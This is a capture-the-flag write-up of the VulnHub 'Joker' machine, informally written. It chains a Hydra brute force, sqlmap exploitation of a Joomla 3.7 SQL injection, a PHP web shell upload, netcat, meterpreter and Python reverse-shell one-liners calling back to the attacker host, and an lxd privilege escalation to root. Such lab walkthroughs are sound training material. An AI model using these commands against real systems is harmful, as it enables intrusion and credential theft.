joker vulnhub

first we do our nmap scan
1-nmap -sC -Pn -p- 192.168.133.144
we got that output

if we open 192.168.133.144 in our browser we found just pics nothing intersted
2-dirb http://192.168.133.144
we got that output

in the /img file we can download all imgs with this simple bash command
fior img in {1..18}; do wget http://192.168.133.144/img/$img.png; done
but for sorry again we didnt found any thing interested

so lets try our second port which is 8080 we realized earlier it has basic auth
so we can user whether metasploit hydra or burpsuite
3-hydra -l joker (#just an expection xd) -P /usr/share/wordlists/rockyou.txt 192.168.133.144 http-get -s 8080
result:

fantastic we got a user joker and pass hannah lets move on
we can type in the browser that link
http://joker:hannah@192.168.133.144:8080
lets do dirb again
dirb http://joker:hannah@192.168.133.144:8080

ok through browing our site we realized that its a joomla web app so we will use joomscan
joomscan — url http://joker:hannah@192.168.133.144:8080
we got that its version is 3.7 which is vulerable to sql injection
we also can use joomlavs
ruby joomlavs.rb -u http://192.168.133.144:8080 — basic-auth joker:hannah -a
after search we found that exploit https://www.exploit-db.com/exploits/42033

URL Vulnerable: http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u “http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent — dbs -p list[fullordering] — auth-type=BASIC — auth-cred=joker:hannah

sqlmap -u “http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent -D joomladb — tables -p list[fullordering] — auth-type=BASIC — auth-cred=joker:hannah

sqlmap -u “http://192.168.133.144:8080/index.php?optio=n=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent -D joomladb -T “#__users” — columns -p list[fullordering] — auth-type=BASIC — auth-cred=joker:hannah

sqlmap -u “http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent -D joomladb -T “#__users” -C id,email,name,password — dump -p list[fullordering] — auth-type=BASIC — auth-cred=joker:hannah

we can use john with the reockyou wordlist but it will consume alot of time so just as expection as user is default joomla as pass is the same
username:joomal pass:joomla and enter them at /administrator

our next goal that we want to upload shell so as we now admin lets move to templates section
we create a php file which contain recerse shell through nc
<?php
system(‘nc 192.168.133.143 5555 -e /bin/bash’);
?>
when we open nc -lvp 5555 nothing happen
so we will use msfvenom to create our shell upload it then recieve it through our meta
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.143 lport=7777 > m.php
cat it copy content past it in any file of templates and
msfconsole use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.133.143
set lport 7777
run
browse to http://192.168.133.144/templates/beez3/m.php
bom!!! session opened
we can get a reverse shell with this python shell
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.133.143”,1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
recieving it with ncat
then we will spawn our shell to make our shell interactivable
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
lxd is a container which has know cve
https://www.exploit-db.com/exploits/46978
after we will follow vuln instructions we should move our file to the victim machine
python -m SimpleHTTPServer 8080 attaker machine
wget 192.168.133.143:8080/files
id
root